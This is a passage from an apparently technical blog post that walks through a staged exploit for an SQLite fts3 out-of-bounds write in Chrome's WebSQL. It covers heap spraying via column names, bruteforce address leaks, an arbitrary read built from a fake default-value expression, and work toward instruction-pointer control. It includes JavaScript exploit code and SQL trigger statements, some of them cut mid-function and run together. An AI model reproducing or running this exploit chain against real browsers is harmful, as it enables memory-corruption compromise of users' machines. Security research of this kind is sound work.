*/ struct Column { char*zName;/* Name of this column, \000, then the type */
Expr *pDflt;/* Default value of this column */ char*zColl;/* Collating sequence. If NULL, use the default */
u8 notNull;/* An OE_ code for handling a NOT NULL constraint */ char affinity;/* One of the SQLITE_AFF_... values */
u8 szEst;/* Estimated size of value in this column. sizeof(INT)==1 */
u8 colFlags;/* Boolean properties. See COLFLAG_ defines below */ };
The actual column name will be held in zName, and there are various other fields that describe the characteristics of a column.
One last thing that should be mentioned is that these functions are called in the parser phase of the SQLite execution pipeline. This means that the only heap noise present is the noise from the tokenizer phase. However, the tokenizer creates almost zero heap noise and therefore, the objects created on the heap as well as the heap activity that occurs during a CREATE TABLE statements is quite manageable.
The following is how an actual Table object and the accompanying Column array would look in memory.
The important thing to notice about these table objects is that they are used for every operation on the table, be it a SELECT, UPDATE, or INSERT statement. Every field in a user query that references things in a certain table, will be checked against this table object that resides in memory. What this means in an exploitation view is that, if it is possible to corrupt certain fields in these objects, we can make SQLite react in peculiar ways when certain SQL queries are issued. Take the column name above as an example. If we could corrupt the name t1 and change it to t1337, and afterwards if the attacker executes the SQL statement “SELECT t1 from test”, the SQLite engine will respond as “No such column as t1 exists”. This is because when the select statement is executed, the SQLite engine will consult the above table and look at the aCol field, and sequentially test if there exists a column which matches the name t1. If it doesn’t find such column, then it returns an error.
Knowing this, and the other elements discussed above, a plan of attack emerges.
Spray a whole bunch of Column arrays, as many to fill more than 2GB’s of memory.
Place the vulnerable apple fts3 allocation in front of the spray.
Trigger the vulnerability, and corrupt one of the column object’s zName field.
Corrupt the field so that it points to an address that we want to leak.
Afterwards, try to leak the value through SQL statements.
There are several caveats with this approach. The problems are not immediately clear until actually constructing the payload and viewing the results, so we will address them as they appear, one by one.
The first problem is that, the maximum number of columns in SQLite is 2000. A single column object’s size is 0x20. This means that the maximum size of a Column array is 0xFA00. In order to spray 2GB worth of memory, 0x8000 Tables with 2000 columns have to be sprayed. 0x8000 doesn’t seem like a big number for SQLite to handle, but when actually spraying that amount of column arrays, the time elapsed from beginning to completion is 10 minutes. This is a lot of time. It was desired to reduce that time to something more manageable.
To address this problem, we used a divide-and-conquer approach. How it works is as follows.
Create a table with a 256MB length column name. Create 8 tables of such kind. This will spray 2GB worth of data.
Place the vulnerable apple fts3 allocation in front of the spray.
Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.
A picture is worth a thousand words. The entire process is illustrated below.
When testing this the first time on Chrome, we realized that it actually works. So we decided to build all kinds of different primitives based on this concept.
Another problem became immediately clear when executing this first experiment several times. That is, the random location of apple. After the first successful corruption, upon the next corruption, the allocation of apple would jump to a completely different place from the previous allocation. This was strongly undesirable. In order to place an object of interest in the OOB write address, that OOB write location needed to stay in a fixed position, instead of jumping all around the place which makes it impossible to build other primitives on. The reason apple kept on moving was because it was allocated based on the 0x10 size-class’s freelist of the thread cache. It is highly likely that heap noise that places a lot of 0x10 chunks on the freelist was the source of uncertainty. In order to understand the actual source of the noise, let’s look at the stack trace of when the bug triggers.
1 2 3 4 5 6 7 8 9 10 11 12
Breakpoint 2, fts3SegReaderNext(p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731 168731 if( !pReader->aDoclist ){ (gdb) bt #0fts3SegReaderNext(p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731 #10x00000000004e414a in fts3SegReaderStart(p=0x74b378, pCsr=0x74dbf8, zTerm=0x751128"sample", nTerm=6) at sqlite3.c:170143 #20x00000000004e427a in sqlite3Fts3MsrIncrStart(p=0x74b378, pCsr=0x74dbf8, iCol=1, zTerm=0x751128"sample", nTerm=6) at sqlite3.c:170183 #30x00000000004d7699 in fts3EvalPhraseStart(pCsr=0x753fe8, bOptOk=1, p=0x7510a8) at sqlite3.c:161648 #40x00000000004d8356 in fts3EvalStartReaders(pCsr=0x753fe8, pExpr=0x751068, pRc=0x7fffffffbe68) at sqlite3.c:162034 #50x00000000004d8c62 in fts3EvalStart(pCsr=0x753fe8) at sqlite3.c:162362 #60x00000000004d5ed1 in fts3FilterMethod(pCursor=0x753fe8, idxNum=3, idxStr=0x0, nVal=1, apVal=0x745540) at sqlite3.c:160604 #70x0000000000465aca in sqlite3VdbeExec(p=0x73f428) at sqlite3.c:89599 #80x000000000045a1cb in sqlite3Step(p=0x73f428) at sqlite3.c:81040
In line 11, it can be observed that the Virtual Table Method fts3FilterMethod is executed from the Virtual Data Base Engine. What this means is that the SELECT statements were tokenized, parsed, bytecode generated, and bytecode executed. It is easy to imagine how much unwanted heap allocations would occur throughout that entire phase of execution.
Generally, there are 2 ways to deal with heap noise.
Precisely track every single heap allocation that occurs when the bug triggers, and make the exploit compatible with all the heap noise.
Upgrade the heap objects that are used during exploitation to a size-class that is not busy, where almost no heap noise occurs in that size-class.
Method 1 is definitely possible, and have been successful in some of the past engagements. However, whenever method 2 is applicable, it is the desirable method and the one that is always chosen to overcome the situation. To address the heap noise, we went with method 2, because the size of the apple allocation is completely attacker controlled.
Now it is time to refine the strategy.
The size of apple should be upgraded to something bigger than 0x800. Let’s say, 0xa00.
0xa00 sized chunks will be sprayed. One of the 0xa00 chunks will be a placeholder to be used with the apple fts3 allocation.
Create a table with a 256MB length column name. Create 8 tables of such kind. This will spray 2GB worth of data.
Create a hole in the placeholder in step2. This will place it on the top of the 0xa00 freelist.
Allocate the 0xa00 sized apple fts3 allocation in the placeholder. Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
Plug in the placeholder hole with a new 0xa00 allocation, so it could be reused for corruption in a later phase.
Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.
The entire process is illustrated below.
This strategy makes it possible to corrupt the same address over and over again with different content on each corruption attempt. It is imperative for the OOB write to work repeatedly and reliably no matter how many times it was executed, in order to to move forwards to the next stages of exploitation. While experimenting with this strategy, it came to realization that the OOB write would not be reliable when the bug trigger SQL statements were coupled with other SQL statements, such as the heap spray statements. However, when the bug trigger SQL statements were detached into a single transaction and was executed separately from any other statements, it work reliably. Even when the primitive was executed 0x1000 times, not a single attempt had apple stray away from the placeholder, and all attempts succeeded with the OOB writing at the same address in all attempts.
One thing to note is how the heap manipulating primitives are constructed. To spray the heap with a controlled size and controlled content chunk, a table is created with a single column, and the column name will be the sprayed content. To create holes, the table will be dropped, and the attached column name will be deallocated from the heap. This creates a perfect primitive to create chunks and free them, in a completely controlled manner.
Another thing worth mentioning is the discrepancy of where the chunks are operating. For instance, the hole creating primitive would free the column name on the parser phase. The stage where the fts table’s term apple is allocated, is during the execution of the Bytecode Engine. There will be a lot of noise in-between where the chunk is freed, and when apple refills it. However, in order to minimize the noise, we’ve upgraded the apple chunk to a 0xa00 size class. Also, as luck has it, the hole created during DROP TABLE remains on the top of the freelist, all the way until apple comes along to pick it back up. This is not always the case as will be seen in the later stages of exploitation, but the DROP TABLE and apple allocation make a perfect pair for the free/refill.
The entire strategy described above would look something like this in javascript.
function create_oob_string(chunk_size, memcpy_offset, payload){
let target_chunk;
let chunk_size_adjusted;
if(chunk_size < 0x1000)
chunk_size_adjusted = chunk_size - 0x10; else
chunk_size_adjusted = chunk_size - 0x100;
chunk_size_adjusted /=2;// To account for the *2 on realloc
target_chunk ='A'.hexEncode().repeat(chunk_size_adjusted);
let payload_hex = payload.hexEncode();
let oob_string = `X'00${create_var_int(chunk_size_adjusted)}${target_chunk}03010200${create_var_int(memcpy_offset)}${create_var_int(payload.length)}${payload_hex}03010200'`;
return oob_string; }
function create_var_int(number){
let varint ='';
let length =0;
let current_number = number;
while(current_number !=0){
let mask = 0x80;
let shifted_number = current_number >>7;
statements.push("CREATE TABLE debug_table(AAA)");
statements.push("CREATE VIRTUAL TABLE ft USING fts3");
statements.push("INSERT INTO ft VALUES('dummy')");
function sploit2(){
let statements =[];
let found_flag =0;
let oob_string = create_oob_string(oob_chunk_size, 0x7FFFFFFF,"ZZZZ");
console.log('Stage2 Start!');
statements.push(`UPDATE ft_segdir SET root = ${oob_string}`);
statements.push(`DROP TABLE test${saved_index}`);
statements.push(`SELECT * FROM ft WHERE ft MATCH 'test'`);
saved_index = spray(statements, oob_chunk_size,1,"A");
function ping_column(current_index){
let statement = `SELECT ${"A".repeat(0x10000000 - 0x100)}_0 FROM test${current_index}`;
db.transaction((tx)=>{
tx.executeSql(
statement,[], function(sqlTransaction, sqlResultSet){
console.log('success!!!');
console.log(`test index : ${current_index}`) if(current_index == big_boy_spray_count-1){
found_flag =-1; } }, function(sqlTransaction, sqlError){
console.log('fail!!!');
console.log(`test index : ${current_index}`)
found_flag =1; } ); },
dbErr, function(){ if(found_flag ==0){
ping_column(current_index +1); } elseif(found_flag ==1){
let corrupted_index = current_index;
console.log(`corrupted index : ${corrupted_index}`);
sploit3_1(corrupted_index); } else{
console.log(`Stage1 : The column name didn't get corrupted. Something's wrong...?`); } } ); }
In the previous stage, it was mentioned that a divide-and-conquer approach was used. The first stage would spray gigantic 256MB heap chunks, which is 0x10000000 in size. The next stage would scale it down with a factor of 0x10, and do the same thing that the previous stage did with 16MB, or 0x1000000 sized chunks. The following illustration describes the entire process.
It’s easy to see where this is going. On stage 4, the same thing is going to happen, but instead this time 0x100000 sized chunks will be sprayed. On stage 5 0x10000. Stage 6 is 0x1000. All of this is to scale down the target chunks until it reaches the size 0x1000. The reason behind this is because column object arrays can only grow up to 0xFA00 in size, as mentioned above. Also, for every 8 new columns, the column array would be realloc’d making the column array jump all around the place, so in order to make the problem more simpler, 0x1000 was chosen instead of 0x10000. 0x1000 is a big enough size to be void of most of the heap noise.
Before proceeding to the next stage, it is worth discussing sources of failures on this part of the stage. First, all chunks bigger than 0x8000 come from the Central Cache. What this means is that, there is an opportunity that other threads can snatch the pages from the Central Cache, before the WebSQL Database thread has a chance to grab them. Fortunately, this doesn’t happen very often. If it does become a problem though, there is a way to get rid of it. The first thing is to track down the problematic allocation, and figure out what size class it is. Next, we would deliberately allocate and free a chunk that matches the size of the problematic chunk, in a way that it doesn’t get coalesced by adjacent chunks. This will place that free’d chunk on the Central class’s freelist, and when the time comes and the rogue allocation takes place, the problematic thread that requested the problematic allocation will snatch that chunk from the freelist, leaving the other chunks alone. This problem actually applies to all stages. However, this kind of problem occurs very rarely.
The more frequently occurring problem is that of allocations of unintended objects. For instance, all of our heap feng-shui resolves around column names. However, in order to create column names, we have to create a table. When tables are created, lots of objects are allocated on the heap such as the table object, expression trees, column affinity arrays, the table name string, and the like. These will be allocated for every table that is created, so the more tables that are created, the more likely it is that those object’s will exhaust their respective size class’s freelist, and request new chunks from the central cache. When the central cache’s freelist is also exhausted, it will start to steal pages that are reserved for large chunks. Those pages will include the holes that we wanted to refill, such as Table6‘s hole in the above illustration. This is a very possible situation, and when the exploit fails in the first couple of stages, most of the time this is the reason behind the failure. To fix this, it is required to create a really long freelist for all the unintended objects that are allocated upon table creation, and make those unintended objects take chunks from that long freelist. This is kind of complicated in terms of TCMalloc, because there is a maximum size on the thread cache’s freelist and if the program reaches that limit, then the Central Cache will keep stealing some of the chunks from the thread cache’s freelist. This maximum limit will be dynamically increased as TCMalloc sees a lot of heap activity on that chunk size-class’s freelist, but in order to take full advantage of it, it is required to have a deep understanding of the dynamic nature of freelists, and study on how it can be controlled.
A more better way to fix this issue would have been to create one gigantic table with 2000 columns, where all columns would act as a spray. In order to create holes, an SQL statement would be issued to change column names into a different name, which would free the previous column name. SQLite actually provides a way to do this, but unfortunately the version of SQLite that Google used at the time the vulnerability existed is 3.24.0, and hence, that functionality was not implemented yet in Chrome’s SQLite.
The actual best way to deal with this is to pre-create all tables that will be used in the entire exploit, and whenever the need arises to spray column names, it is possible to do so with the ALTER TABLE ADD COLUMN statement. The exploit does not specifically address this issue, and should be re-run if it fails during this stage.
After all the spraying and corrupting, this entire process until stage 6 takes a little over 1 minute in a virtual machine. This is a lot more manageable than 10 minutes. However, 1 minute is still too long to be used in the real world. As the purpose was to create a Proof-of-Concept, the exploit was not improved to further to shave off some more time, due to time constraints. Nevertheless, we will discuss on ideas of how to eliminate most of the spraying time in the end of the blog post.
Now that everything has been covered, we can proceed to Stage 7.
Stage 7
Stage 7’s has only one purpose. Place a 0x1000 sized Column Object Array into the corrupted 0x1000 chunk, and find out which of the column objects inside the array is the one that gets corrupted. This is illustrated below.
After this, it is possible to know which of the 104 columns were corrupted. We can keep that corrupted column index bookmarked, and use it to probe the result of all future corruption attempts.
There is a catch here though. What if the corruption happens after the 104 columns, in one of the columns in the range 104 ~ 128? Since no Column object exists in that range, it would be impossible to know which part of the column object array is corrupted. To fix this, when the exploit determines that the OOB write falls into that specific range, it uses a different apple for the OOB write. Specifically, it uses the apple that’s right in front of the current apple.
By using the apple slot that is 0xa00 before the current apple, The corruption falls back into the 0 ~ 104 range, and Stage 7 can be run again to retrieve the corrupted column. This might fail sometimes, and the previous apple block is actually at a completely random position. When this fails, the exploit should go back to the previous stages and find out which of the other huge blocks of column got corrupted, and then work forwards from there. This is not particularly implemented in the exploit and the exploit should be run again if it fails during this stage.
Before going to the next stage, Stage 7 uses the OOB write to completely wipe out the Column Name address field to 0. The reason is because when the table is dropped, SQLite will go through all the column objects in the array, and issue tc_free(column_name_address) to all of the objects. If the address fed to tc_free is not an address that was returned from a previous tc_malloc, then the program will crash. Wiping it to 0 will make it call tc_free(0), which is essentially a no-op.
Now that we know which column index was corrupted, we can now proceed to Stage 8.
Stage 8
This is the most fragile part of the exploit.
The first thing that Stage 8 tries to achieve, is to drop 3 of the 0x1000 chunks starting from the corrupted one, and fill them back in with controlled chunks. It relies on the fact that when the 0x1000 chunks were sprayed at Stage 6, they were all allocated consecutively, back-to-back from each other. In reality, this is not always the case. Sometimes the 0x1000 will be allocated sequentially, and then at some point the next allocation suddenly jumps to a random location. This happens a lot frequently on small chunks, and it happens rarely in large chunks. The exploit could have been adapted to work on large chunks, but in the current exploitation strategy, the 3 chunks had to include the 104 column object array and place it in the first chunk. The reason behind this is because there must exist a way to place attacker controlled arbitrary data on the heap. In the course of exploiting the bug, such primitive was not used. This is because column names, or in fact, all names that are included in an SQL query is first converted into UTF-8 format before it is stored in memory or the database. To go around that, we use the OOB write itself to write arbitrary payload on memory. This requires everything to be behind the 104 column array, so the address of the arbitrary data can actually be retrieved and used throughout the exploit. All of this will become clear in Stage 9. We will also discuss how to remove this requirement in Stage 10. We were not particularly happy with the instability in this stage, but we just moved forward because the purpose was to prove exploitability. For now, we’ll just assume that the 3 chunks will succeed in being allocated next to each other.
Now we should discuss what kind of 3 chunks are going to be placed.
The first chunk will hold a table of 104 columns. But this time, the corrupted column will point to a column name that is 0x1000 in size. This column name will be filled with B’s.
The second chunk will be that column name, filled with B’s.
The third chunk will be an Fts3Table object.
This sounds easy on text, but the layout of the first two chunks are more complicated than it sounds. Since those two chunks are created in a single CREATE TABLE query, the freelist has to be constructed carefully, so that the two allocations will be placed in that exact order. To make things even more complicated, the freelist will be scrambled depending on which column index was corrupted. Therefore, the freelist must be massaged in different ways, for different column indexes. The way this was solved was to deliberately create holes, deliberately plugging existing holes in different positions in the freelist, changing the order of allocation/free, and adding garbage columns just to compensate for unwanted holes in the freelist. This had to be tested for every index in the column array, and was a tedious process. The end result kind of looks like this.
// Just for good measure. In case there are any holes left behind
ft3_spray(statements, 0xD80,"AAAA");
ft3_spray(statements, 0xD80,"AAAA");
ft3_spray(statements, 0xD80,"AAAA");
ft3_spray(statements, 0xD80,"AAAA");
runAll(statements,(event)=>{
sploit8_2(); }); }
There could be a better way to do this, but this was how it was done. The alternative exploitation strategy discussed in Stage 10 will remove the need for this laborious task, so future versions of the exploit should use that strategy instead. Now chunk 1 and chunk 2 is covered. Chunk 3 introduces a new object called Fts3Table. This is an object that is created during the execution of a CREATE VIRTUAL TABLE fts3() query. Let’s take a glimpse of the function that is responsible of creating that object.
/* Fill in the azColumn array */ for(iCol=0; iCol<nCol; iCol++){ char*z; int n =0; z =(char*)sqlite3Fts3NextToken(aCol[iCol], &n); if( n>0){ memcpy(zCsr, z, n); } zCsr[n]='\0'; sqlite3Fts3Dequote(zCsr); p->azColumn[iCol]= zCsr; zCsr += n+1; assert( zCsr <=&((char*)p)[nByte]); }
// snipped for brevity }
/* ** A connection to a fulltext index is an instance of the following ** structure. The xCreate and xConnect methods create an instance ** of this structure and xDestroy and xDisconnect free that instance. ** All other methods receive a pointer to the structure as one of their ** arguments. */ struct Fts3Table { sqlite3_vtab base;/* Base class used by SQLite core */ sqlite3 *db;/* The database connection */ constchar*zDb;/* logical database name */ constchar*zName;/* virtual table name */ int nColumn;/* number of named columns in virtual table */ char**azColumn;/* column names. malloced */ u8 *abNotindexed;/* True for 'notindexed' columns */
sqlite3_tokenizer *pTokenizer;/* tokenizer for inserts and queries */ char*zContentTbl;/* content=xxx option, or NULL */ char*zLanguageid;/* languageid=xxx option, or NULL */ int nAutoincrmerge;/* Value configured by 'automerge' */
u32 nLeafAdd;/* Number of leaf blocks added this trans */
/* Precompiled statements used by the implementation. Each of these ** statements is run and reset within a single virtual table API call. */
sqlite3_stmt *aStmt[40];
sqlite3_stmt *pSeekStmt;/* Cache for fts3CursorSeekStmt() */
char*zReadExprlist; char*zWriteExprlist;
int nNodeSize;/* Soft limit for node size */
u8 bFts4;/* True for FTS4, false for FTS3 */
u8 bHasStat;/* True if %_stat table exists (2==unknown) */
u8 bHasDocsize;/* True if %_docsize table exists */
u8 bDescIdx;/* True if doclists are in reverse order */
u8 bIgnoreSavepoint;/* True to ignore xSavepoint invocations */ int nPgsz;/* Page size for host database */ char*zSegmentsTbl;/* Name of %_segments table */
sqlite3_blob *pSegments;/* Blob handle open on %_segments table */
int nIndex;/* Size of aIndex[] */ struct Fts3Index { int nPrefix;/* Prefix length (0 for main terms index) */
Fts3Hash hPending;/* Pending terms table for this index */ }*aIndex; int nMaxPendingData;/* Max pending data before flush to disk */ int nPendingData;/* Current bytes of pending data */
sqlite_int64 iPrevDocid;/* Docid of most recently inserted document */ int iPrevLangid;/* Langid of recently inserted document */ int bPrevDelete;/* True if last operation was a delete */ };
struct sqlite3_vtab { const sqlite3_module *pModule;/* The module for this virtual table */ int nRef;/* Number of open cursors */ char*zErrMsg;/* Error message from sqlite3_mprintf() */ /* Virtual table implementations will typically add additional fields */ };
There are several things noteworthy in this function. First, the Fts3Table object is dynamically sized. It is sized to encompass all of the column names, which gets stored in the object itself. Because column names are user controlled, the entire size of the Fts3Table is user controlled. This means that we can place an Fts3Table chunk into an arbitrary size-class freelist of our choosing. Next, there is a member, azColumn which points somewhere inside the object itself. If this value can be leaked, it can be used to calculate the object’s address. Next, there is a member called base. This base member is a struct, which has another member called pModule. This pModule member points within the .data section of the SQLite library. By leaking this address, it is possible to bypass ASLR. Finally, there is member called db. This points to an sqlite3 object, which is allocated when the WebSQL database is first opened. This occurs very early in the stage of exploitation, so we can expect that this object will be somewhere in the beginning of the heap. All of these object fields will be utilized later on during exploitation.
For now, we just want this Fts3Table object to be allocated as the third chunk. As mentioned above, since the column name actually goes into the Fts3table object, the size is completely controlled so we can make it use the 0x1000 size freelist. However, there is one thing to keep in mind. That is, before this chunk is created, a Table object is also created (because an fts3 table is also just a regular table) before the Fts3Table object is created. What this means is that the column name will actually be stored in 2 places. This will create 2 0x1000 chunks, which is undesirable. To get around this issue, we need the column name of the Table object to use a freelist other than the 0x1000 freelist. The boundary of a chunk being placed in a 0x1000 freelist is 0xD00. Any chunk smaller than that will be placed in the 0xD00 freelist. Therefore, we can create an fts3 table with a column that is smaller than 0xD00, and that column name will be take a chunk from the 0xD00 freelist. On the other hand, the combined size of the Fts3Table object calculated above in line 53 would be bigger than 0xD00, making it grab a chunk from the 0x1000 freelist. Problem solved. Now the Fts3Table object can be nicely placed in the third chunk.
The following illustration is what happens next in Stage 8.
Now we know the 1st, 2nd, and 3rd byte of the second chunk’s address. We will not bruteforce the 4th byte just yet, because there is a risk of hitting unmapped memory when bruteforcing it without knowing the byte’s range. Instead, we will proceed to leak the 5th, and 6th byte in Stage 9.
Stage 9
There are a total of 8 bytes that constitute an address, but for the purpose of leaking, we only need to leak 6 of them. This is because the heap grows upwards from the lowest address, and the heap would have to grow several hundred gigabytes in order to make the 7th byte of the address flip from 0 to 1. In stage 9, the 5th and 6th byte will be leaked one at a time. The way it is leaked is different from Stage 8. This time, it is not possible to bruteforce the byte, because setting the byte to an arbitrary value will make SQLite hit unmapped memory when it tries to access the column name. Therefore, the bytes have to be exactly leaked, using a different method. This is made possible by actually reading out the bytes as column names.
This was actually not possible until the 3 bytes of the second chunk were leaked in Stage 8. Armed with knowledge of the 3 bytes, we can cook up this kind of scenario.
There are a couple things to mention before progressing. First, it was surprising that SQLite would accept everything as a column name, including spaces, newlines, and special characters. All that was needed to make it work was to surround the entire column name with quotes. However, checking the existence of the column is not as simple as issuing a SELECT statement. For some reason, the tokenizer that handles the SELECT statement would eat all the column names between the quotes, and treat it like an *. Testing other different queries, we came across INSERT. By surrounding the column name with a parenthesis and quotes, it was possible to test if certain column names existed, even if the column name included whitespaces and special characters.
All of this seems perfect, and it also gives rise to another question. Why not just leak all bytes using this method? Unfortunately, things are slightly more complicated.
The biggest problem with this method is, that it is only possible to leak bytes that fall into the ascii range. In the above illustration, the 6th byte is okay and will be leaked without issues. However, the 5th byte falls outside the ASCII range, and will not be leaked. The reason for this is that when we issue an SQL statement, if there are any characters in a column name above the \x80 range, then SQLite will treat the characters as Unicode and internally convert them to UTF-8. It is the converted UTF-8 values that will be memcmp’d byte by byte with what the column name that resides in memory. For instance, if we ping for a column “\xC0”, then SQLite will convert that into UTF-8 form “\xC3\x80”, and “\xC3\x80” will be compared to what lies in memory. Only if the two matches, then SQLite will deem that the column exists. This brings up a serious problem where bytes can be leaked with an only a 50% success rate. However, as luck would have it, the 6th byte is always within the ASCII range. This is because as explained earlier, it would take several dozen GB’s of spray to make the 6th byte flip above 0x80. Therefore, there is no issue with the 6th byte. The problem is the 5th byte.
It would be sad to say that we would have to live with the 5th byte issue, and pray to god that it falls within that range. However, all things can be fixed. The following illustrates how to fix this issue.
Technically, the memcpy isn’t actually copying backwards. It’s just starting from a lower offset than 0x7FFFFFFF, such as 0x7FFFFFF0, and then copying all the way up to 0x80000000.
With this, it is possible to leak almost any byte, by constructing a unicode lookup table. Constructing this table requires quite some time and effort, so it was not specifically implemented in the exploit, but this would be the right way to correct this issue. Also, since the unicode library used by SQLite does not do a 1-on-1 matching on all Unicode characters, but rather translates them programatically, there could be cool ways to abuse the Unicode engine to produce a sequence of bytes that could be looked up easily, without having to construct a full blown table. This is left as an exercise for the interested reader. In the exploit, it tests the 5th byte and if it falls outside the ASCII range, it prints that the exploit should be run again by fully closing chrome and reopening it, to get a better 5th byte value.
After this stage, the exploit can finally start bruteforcing the 4th byte.
Based on the values that were leaked from the topmost bytes, the exploit runs a series of heuristics to guess the start value for bruteforcing, so that it falls within a mapped region, as well as making sure that the value is lower than the actual byte to be leaked. The actual heuristics would look as follows.
if(fts3_azColumn_leaked_byte_count >=3){
console.log(`Truncate it on purpose. We're still gonna brute the 4th byte because we don't know whether the leaked 4th byte is case insensitive and hence, inaccurate`);
This would handle all cases. Afterwards, the same logic in Stage 8 is applied to bruteforce the 4th byte. Now all 6 bytes of the address have been leaked. It’s time to proceed to Stage 10 and create an AAR.
Stage 10
If we can’t leak exact values from column names because of the unicode restriction, then how is it possible to create an AAR?
For this, we are going to use another field in the Column object that hasn’t been covered in detail, which is the Default Value. It is possible to set a default value using the following SQL statement.
As a reminder, the following is the definition of the Column object.
1 2 3 4 5 6 7 8 9 10 11 12 13
/* ** information about each column of an SQL table is held in an instance ** of this structure. */ struct Column { char*zName;/* Name of this column, \000, then the type */ Expr *pDflt;/* Default value of this column */ char*zColl;/* Collating sequence. If NULL, use the default */
u8 notNull;/* An OE_ code for handling a NOT NULL constraint */ char affinity;/* One of the SQLITE_AFF_... values */
u8 szEst;/* Estimated size of value in this column. sizeof(INT)==1 */
u8 colFlags;/* Boolean properties. See COLFLAG_ defines below */ };
These Default Values get stored in pDflt field of the Column object. They are not just stored as a stream of bytes, but they are stored in what SQLite calls an Expression Tree. Expressions represent part of the SQL statement, usually the part in the end such as the WHERE clause. This is the part of an SQL query which is user configurable, where the user could add different kinds of keywords and statements so that the SQL query would react differently based on the entire statement. The entire expression is represented as a tree, so SQLite can process it in a recursive manner. The default value specified in the end of the CREATE TABLE statement is also treated as part of the expression, and is stored within the tree. Let’s look at the definition of the Expr structure.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
struct Expr {
u8 op;/* Operation performed by this node */ char affinity;/* The affinity of the column or 0 if not a column */
u32 flags;/* Various flags. EP_* See below */ union{ char*zToken;/* Token value. Zero terminated and dequoted */ int iValue;/* Non-negative integer value if EP_IntValue */ } u;
/* If the EP_TokenOnly flag is set in the Expr.flags mask, then no
** space is allocated for the fields below this point. An attempt to
** access them will result in a segfault or malfunction.
*********************************************************************/
Expr *pLeft;/* Left subnode */
Expr *pRight;/* Right subnode */
//snipped for brevity }
Like any other tree, it has a left and right node pointer, and it has certain flags and a pointer that points to the actual node data. Let’s see how a default value looks in memory.
(gdb) p *(Expr*)0x74b6c0
$26 = {
op = 143 '\217',
affinity = 0 '\000',
flags = 8438784,
u = {
zToken = 0x1337 <error: Cannot access memory at address 0x1337>,
iValue = 4919 }, }
This might seem a little complicated at first glance. The only thing important in the Expr object is the opcode, the flags, and the zToken. Here is how the above series of objects would look in a more graphical fashion.
Here is what we want to achieve, in order to gain AAR.
We would create a fake Expr object. The Expr object would represent a leaf node (EP_TokenOnly | EP_Leaf) so SQLite won’t go looking into the pLeft and pRight members, and the node will be set to a static node (EP_Static) so that SQLite won’t free the zToken member when it’s about to dispose the Expression tree. Then, the opcode will be set to OP_String, so that SQLite will treat the address that zToken points to as a NULL terminated string.
The next question is where are we going to write this fake Expr object?
This brings up the requirement issue that was presented on Stage 8. The reason why we wanted to have the three chunks in order is because we could assume that the column object array (the first chunk) is placed right before leaked second chunk. By having the objects laid out that way, writing arbitrary data that represents the fake Expr object, and retrieving the object’s address is instantly solved. This is depicted in the following pictures.
This explains why the precondition in Stage 8 was required. However, we should at least discuss how this requirement can be eliminated, because having the 3 chunks allocated sequentially is the least reliable part of the entire exploit, and it would be nice if there was a way to avoid it. In order to get rid of the requirement, the following steps can be taken.
On the beginning of Stage 8, allocate a bunch of 0x2000 chunks. Then deallocate one of the 0x2000 chunks in the middle.
Drop the table that holds the 0x1000 chunk, and allocate a column array with 104 column names. The corrupted column index will allocate a column name of size 0x2000. This will place the column object array back in it’s 0x1000 place, and place the 0x2000 column name into the hole that was created in step 1.
Execute Stage 8 to leak the lower 3 bytes of the 0x2000 chunk address.
Corrupt the column name address so that it points to the the next 0x2000 chunk.
Use the INSERT statement to find which table is responsible for that chunk.
Drop that table. Place the Fts3Table chunk there.
Corrupt the column name address so that it points to the 0x2000 chunk that’s after the Fts3Table.
Use the INSERT statement to find which table is responsible for that chunk.
Drop that table. Place a 0x2000 chunk with arbitrary data on there, that could be used for the fake Expr object.
Now we have 3 chunks allocated sequentially, and the address of all three chunks are known.
This is far more reliable and precise than the “Pray that the three 0x1000 chunks are next to each other” method. The only problem is to find a primitive which the user can allocate an arbitrary sized chunk with attacker controlled data. This can not be done with column names because of the UTF-8 conversion. How to find such primitive will be discussed in the end of the blog post, in the “Increasing Speed and Reliability” section.
Now back to the Expr objects. The final question is how the fake Default Value object could be used to read data from an arbitrary address. After all, only the default value has been set, and SQLite has no way to read the default value out of the table.
This is true and not true. It is impossible to issue a query to read the default value that was set by the CREATE TABLE statement. However, it is possible to indirectly read it. The logic behind it is simple.
We INSERT into the corrupted table a single value using an innocent column, and let SQLite write the default value of the corrupted column into the table. What SQLite does under the hood is, it goes through each column in the Column Object array and checks if any of the column objects have the Default Value Expression tree set. If it is 0, then SQLite fills that column’s data in the new row with NULL. If it actually sees some address, then it follows the expression tree and parses it. SQLite sees our fake Expr object, and it sees that it’s a leaf node. It looks at the column opcode and sees OP_STRING. Therefore, it treats the node value as a string address, and it grabs the NULL terminated string from the address, and uses that to fill the the new row’s column data. Since SQLite does all of this itself, there is no UTF-8 conversion involved, and the value is simply treated as a NULL terminated string, and copied as-is.
Later, we can SELECT that value from the table, and read it back out. Since the column type of the corrupted column is set to BLOB, sqlite will treat the underlying value as a series of hex bytes and return it to the user. For the user to actually see the data in it’s original form, the result data can be passed through the hex() or the quote() function, so that the hex bytes will be converted to a series of ascii characters that represent the hex data.
This is how an AAR is constructed. We indirectly read the data by INSERTing, and then SELECTing. Since the AAR can only read strings up to a NULL byte, all data is read one byte at a time, and the resulting bytes are all combined into an array where it can later be processed. Using this, it is possible to leak all data on the Fts3Table object, including the very first member. This bypasses ASLR. We are going to further abuse this AAR to read more interesting things.
Stage 11
Now the final problem is how to control $RIP.
The current situation is that AAR is achieved, but AAW isn’t. Therefore, in order to skip AAW, it would be desirable to find a code execution primitive in one of the objects that we can OOB write. In the current heap layout, the only object that has potentially interesting fields which lies in the boundaries of the OOB write is the third chunk, which is the Fts3Table object. Remember this?
That is the object we want to corrupt. We can start from the first chunk which is the topmost chunk in the above picture, OOB write while protecting the column array data all the way to the end of the first chunk, then all the way to the end of the second chunk, and start corrupting fields in the Fts3Table object. Now the question is if there is any interesting field that would lead to code execution.
After scavenging through the fts3 Virtual Table Methods, we came across this function.
/* Free any prepared statements held */
sqlite3_finalize(p->pSeekStmt); for(i=0; i<SizeofArray(p->aStmt); i++){
sqlite3_finalize(p->aStmt[i]); }
sqlite3_free(p->zSegmentsTbl);
sqlite3_free(p->zReadExprlist);
sqlite3_free(p->zWriteExprlist);
